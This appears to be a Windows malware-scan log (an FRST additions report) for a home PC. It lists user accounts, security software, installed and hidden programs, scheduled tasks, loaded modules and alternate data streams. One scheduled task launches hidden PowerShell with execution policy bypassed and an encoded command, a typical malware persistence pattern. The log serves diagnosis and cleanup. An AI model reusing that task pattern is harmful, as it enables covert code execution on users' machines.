MuhammadAkim (S-1-5-21-1436452318-2580999886-2786755032-1001 - Administrator - Enabled) => C:\Users\MuhammadAkim
sesay (S-1-5-21-1436452318-2580999886-2786755032-1003 - Limited - Enabled) => C:\Users\sesay
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Bitdefender Antivirus (Enabled - Up to date) {9A0813D8-CED6-F86B-072E-28D2AF25A83D}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Bitdefender Antispyware (Enabled - Up to date) {2169F23C-E8EC-F7E5-3D9E-13A0D4A2E280}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {A23392FD-84B9-F933-2C71-81E751F6EF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.3.183.90 - Adobe Systems Incorporated)
Apple Application Support (32-bit) (HKLM-x32\...\{7FA9ECCF-A2DE-4DA1-BFF3-81260DBDA68F}) (Version: 4.1.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{691F30EB-9009-475A-B8A9-E1BF39598FD5}) (Version: 4.1.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
Bitdefender Total Security 2015 (HKLM\...\Bitdefender) (Version: 19.2.0.151 - Bitdefender)
Blender (HKLM-x32\...\{1115EF75-E8C1-4BA1-829F-1B8460D47701}) (Version: 2.76.2 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version:  - Broadcom Corporation)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.1.170 - Broadcom Corporation)
Chromium (HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Chromium) (Version: 46.0.2480.0 - Chromium)
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Citrix Online Launcher (HKLM-x32\...\{678753E6-E526-4AE5-A144-00240772543A}) (Version: 1.0.393 - Citrix)
Coyote The Outlander (x32 Version: 3.0.2.59 - WildTangent) Hidden
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.9.5009 - CyberLink Corp.)
CyberLink PowerBackup 2.6 (HKLM-x32\...\InstallShield_{ADD5DB49-72CF-11D8-9D75-000129760D75}) (Version: 2.6.2.1307 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.6.4930 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.3.0 - Dropbox, Inc.)
Energy Star (HKLM-x32\...\{FC0ADA4D-8FA5-4452-8AFF-F0A0BAC97EF7}) (Version: 1.0.9 - Hewlett-Packard Company)
Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
Evernote v. 5.8.1 (HKLM-x32\...\{4FD2D1C8-8636-11E4-9D21-00163E98E7D6}) (Version: 5.8.1.6061 - Evernote Corp.)
Foxit PhantomPDF (HKLM-x32\...\{4E32271C-B55A-4CDF-8DB7-88FD1C45927C}) (Version: 7.0.310.226 - Foxit Software Inc.)
Gameo (HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Gameo) (Version: 0.14.1 - IronSource Ltd.) <==== ATTENTION
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.97 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
Hidden Odyssey 2 in 1 Pack (x32 Version: 3.0.2.59 - WildTangent) Hidden
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
HP Documentation (HKLM-x32\...\{4BF17F05-B2DA-4266-8AEB-09BC9D008EAF}) (Version: 1.3.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7960.5089 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.39 - Hewlett-Packard)
HP Support Information (HKLM-x32\...\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 13.00.0000 - Hewlett-Packard)
HP Support Solutions Framework (HKLM-x32\...\{F6A11738-3EE4-4573-AEA5-6CD5D491C167}) (Version: 12.0.30.219 - Hewlett-Packard Company)
iCloud (HKLM\...\{4B48E22A-2FB0-4EFA-B99E-954B1E50CD69}) (Version: 5.1.0.34 - Apple Inc.)
Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
Insane Cold: Back to the Ice Age (x32 Version: 3.0.2.59 - WildTangent) Hidden
Inst5675 (Version: 8.01.39 - Softex Inc.) Hidden
Inst5676 (Version: 8.01.39 - Softex Inc.) Hidden
Intel® Chipset Device Software (x32 Version: 10.0.14 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.30.1072 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4360 - Intel Corporation)
iTunes (HKLM\...\{FBEB98F8-64E4-4FA3-A15E-4A9F42FF962E}) (Version: 12.3.2.35 - Apple Inc.)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java 8 Update 71 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418071F0}) (Version: 8.0.710.15 - Oracle Corporation)
LaunchDIY_Update (HKLM-x32\...\{E651B3B6-6379-4FB5-BDC1-9E7BCFA20ABC}) (Version: 1.01.001 - LAUNCH)
Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
LSDCDriverIntall (HKLM-x32\...\InstallShield_{CE0DB043-A252-4119-BD9E-1F0E27F1725A}) (Version: 1.00.0000 - Your Company Name)
LSDCDriverIntall (x32 Version: 1.00.0000 - Your Company Name) Hidden
Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation)
Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4787.1002 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mystery Expedition: Prisoners of Ice (x32 Version: 3.0.2.59 - WildTangent) Hidden
NowUSeeIt Player (HKLM-x32\...\{B1929100-0FD2-40A0-A385-1344D2651760}) (Version: 1.6.2.2 - NowUSeeIt Player)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4787.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4787.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4787.1002 - Microsoft Corporation) Hidden
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
Paladins (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF402}) (Version: 0.13.785.1 - Hi-Rez Studios)
Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29084 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.37.1119.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7673 - Realtek Semiconductor Corp.)
Rory's Restaurant (x32 Version: 3.0.2.59 - WildTangent) Hidden
Royal Envoy Double Pack (x32 Version: 3.0.2.59 - WildTangent) Hidden
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
Screencast-O-Matic v2.0 (HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Screencast-O-Matic v2.0) (Version: v2-1.8 - Screencast-O-Matic)
Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.109 - Skype Technologies S.A.)
Solitaire Mystery Four Seasons (x32 Version: 3.0.2.51 - WildTangent) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Trove (HKLM-x32\...\Steam App 304050) (Version:  - Trion Worlds)
Unturned (HKLM-x32\...\Steam App 304930) (Version:  - Smartly Dressed Games)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App for HP (x32 Version: 4.0.11.14 - WildTangent) Hidden
Windows Driver Package - LAUNCH (usbser) Ports  (09/20/2013 1.2.0) (HKLM\...\3759075FAEFA0B24F379EF0A07B04C7C06C74D0D) (Version: 09/20/2013 1.2.0 - LAUNCH)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1436452318-2580999886-2786755032-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\MuhammadAkim\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1436452318-2580999886-2786755032-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {000C2A75-CBC4-4BC7-A9C4-070486FDCD2C} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-01-15] ()
Task: {04C31380-2799-493E-A3C0-05D5EE7729AC} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {09E882AD-8DCF-47DC-B2B7-933BAA9151D6} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {0C66856B-2EC1-4650-9F60-0D3C51D073ED} - System32\Tasks\Start SimplePass => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [2015-01-30] (Hewlett-Packard)
Task: {0CFE2E40-6A97-48C5-9F38-DE82315CF1B0} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {0F7474FC-A7C3-47B9-B9C3-2C89A5CF7613} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Opt-in For HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2014-08-22] (Hewlett-Packard Company)
Task: {2901C585-38A6-4BFF-81E4-A7E56076AC80} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {3487E524-CC1E-40C1-A28C-FFB73CFCACC5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {34B91E30-A000-41AA-86ED-47977E230D7B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-08] (Google Inc.)
Task: {34FAAC01-9988-4B7B-AA01-B4575F039755} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-08-22] (Hewlett-Packard Company)
Task: {3844BEEF-CF70-4844-B33C-7F055DC53979} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-08] (Google Inc.)
Task: {3D22F0BC-A3AB-4043-8454-530F057F30F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2014-05-12] (Hewlett-Packard Company)
Task: {42524D92-B8DF-4B2B-ADB3-9BBE516AAC18} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {4B2533A6-EC3C-4270-8879-74F1C821B8F6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2014-08-22] (Hewlett-Packard Company)
Task: {544FA89D-47B6-43D4-B29C-58A102D76A16} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-12-22] (Microsoft Corporation)
Task: {5EA8989E-695C-4128-8D41-5A39AE1FD699} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-12-03] (HP Inc.)
Task: {611A173B-24FB-43F7-AF35-BBB5C899C7F6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2015-12-03] (HP Inc.)
Task: {70892899-6FC8-4769-94C5-D14C9F5BB3B3} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2016-01-21] (Microsoft Corporation)
Task: {7A799A83-C38F-4E8D-9AD7-E9BF8C22C08E} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-01-13] (Microsoft Corporation)
Task: {949DE924-F62B-451E-BEF7-D4FA0E42D772} - System32\Tasks\gameo_update => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [2015-07-04] () <==== ATTENTION
Task: {9D92E479-7808-4524-A838-65C11FFA0AC4} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2015-06-24] (Hewlett-Packard)
Task: {A183184B-C1D5-4B8E-9471-0191AB50002B} - System32\Tasks\Start OPBHOBroker => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [2015-01-30] (Hewlett-Packard)
Task: {AE277527-634A-40A0-BD99-54EC59953EAE} - System32\Tasks\File History (rehydration) - S-1-5-21-1436452318-2580999886-2786755032-1001
Task: {B250CE2D-D65C-440B-A962-7F961BE2DAA6} - System32\Tasks\YCMServiceAgent => c:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe [2015-01-29] (CyberLink Corp.)
Task: {C2E12A87-FAD3-4C99-AA05-CEBCCC871DA3} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DFB6070B-F7D4-4F4A-862C-E18D88730BF4} - System32\Tasks\{0E0B0D47-0E08-7D0C-0F11-050E7E7E1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand 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
Task: {E11C5705-71C6-4159-A273-D013ADF11E46} - System32\Tasks\Start OPBHOBrokerDesktop => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [2015-01-30] (Hewlett-Packard)
Task: {F40AE417-C53C-4B7D-9288-ACB8CD641C45} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-12-22] (Microsoft Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-11-11 09:42 - 2015-11-11 09:42 - 00265080 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\txmlutil.dll
2015-08-16 12:08 - 2013-09-03 13:29 - 00101328 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdmetrics.dll
2015-08-16 12:08 - 2015-08-13 17:36 - 00003072 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\UI\accessl.ui
2015-12-18 17:53 - 2015-12-18 17:53 - 00152816 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdfwcore.dll
2016-01-25 13:02 - 2016-01-25 13:02 - 01119064 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_01851_009\ashttpbr.mdl
2016-01-25 13:02 - 2016-01-25 13:02 - 00794832 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_01851_009\ashttpdsp.mdl
2016-01-25 13:02 - 2016-01-25 13:02 - 03038112 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_01851_009\ashttpph.mdl
2016-01-25 13:02 - 2016-01-25 13:02 - 01648408 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_01851_009\ashttprbl.mdl
2015-01-30 21:07 - 2015-01-30 21:07 - 02169344 _____ () C:\Program Files\Hewlett-Packard\SimplePass\autheng.dll
2015-01-30 21:05 - 2015-01-30 21:05 - 00021504 _____ () C:\Program Files\Hewlett-Packard\SimplePass\cryptodll.dll
2015-01-30 21:05 - 2015-01-30 21:05 - 00035840 _____ () C:\Program Files\Hewlett-Packard\SimplePass\ssplogon.dll
2015-01-30 21:05 - 2015-01-30 21:05 - 00055296 _____ () C:\Program Files\Hewlett-Packard\SimplePass\RandomPass.dll
2015-01-30 21:16 - 2015-01-30 21:16 - 00431696 _____ () C:\Program Files\Hewlett-Packard\SimplePass\mstrpwd.dll
2015-01-30 21:16 - 2015-01-30 21:16 - 00746064 _____ () C:\Program Files\Hewlett-Packard\SimplePass\GraphicalPwd.dll
2015-08-18 20:17 - 2015-10-13 04:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2015-10-30 02:18 - 2015-10-30 02:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-12-07 06:45 - 2015-12-07 06:45 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-12-07 06:45 - 2015-12-07 06:45 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-10-27 16:44 - 2015-09-01 11:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-01-30 21:09 - 2015-01-30 21:09 - 00065024 _____ () C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
2015-12-18 18:11 - 2015-12-06 23:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-18 18:11 - 2015-12-06 23:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-13 21:39 - 2016-01-04 20:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-13 21:39 - 2016-01-04 20:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 15:16 - 2016-01-16 00:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 15:16 - 2016-01-16 00:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-10-13 05:45 - 2015-10-13 05:45 - 00085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-10-13 05:45 - 2015-10-13 05:45 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-01-27 11:26 - 2016-01-27 11:26 - 09737216 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_2015.25.24.0_x64__8wekyb3d8bbwe\WinStore.Entertainment.Mobile.dll
2015-10-30 02:18 - 2015-10-30 02:18 - 02100064 _____ () C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
2016-01-13 21:39 - 2016-01-04 20:24 - 00936960 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-01-22 11:25 - 2016-01-22 11:26 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2014-10-10 11:37 - 2014-10-10 11:37 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-08-22 17:39 - 2015-08-22 17:39 - 00316576 _____ () C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\AppVIsvStream32.dll
2016-01-22 11:25 - 2016-01-22 11:25 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-22 11:25 - 2016-01-22 11:26 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-01-28 21:47 - 2016-01-27 12:39 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\libglesv2.dll
2016-01-28 21:47 - 2016-01-27 12:39 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\libegl.dll
2016-01-28 21:47 - 2016-01-27 12:39 - 16799048 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.97\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\MuhammadAkim\Downloads\CRP09182014 (1).exe:BDU
AlternateDataStreams: C:\Users\MuhammadAkim\Downloads\CRP09182014 (2).exe:BDU
AlternateDataStreams: C:\Users\MuhammadAkim\Downloads\CRP09182014.exe:BDU
AlternateDataStreams: C:\Users\sesay\Desktop\FRST64.exe:BDU
AlternateDataStreams: C:\Users\sesay\Downloads\ChromeSetup.exe:BDU
AlternateDataStreams: C:\Users\sesay\Downloads\CurseClientSetup.exe:BDU
AlternateDataStreams: C:\Users\sesay\Downloads\InstallPaladins.exe:BDU
AlternateDataStreams: C:\Users\sesay\Downloads\MEGAsyncSetup.exe:BDU
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
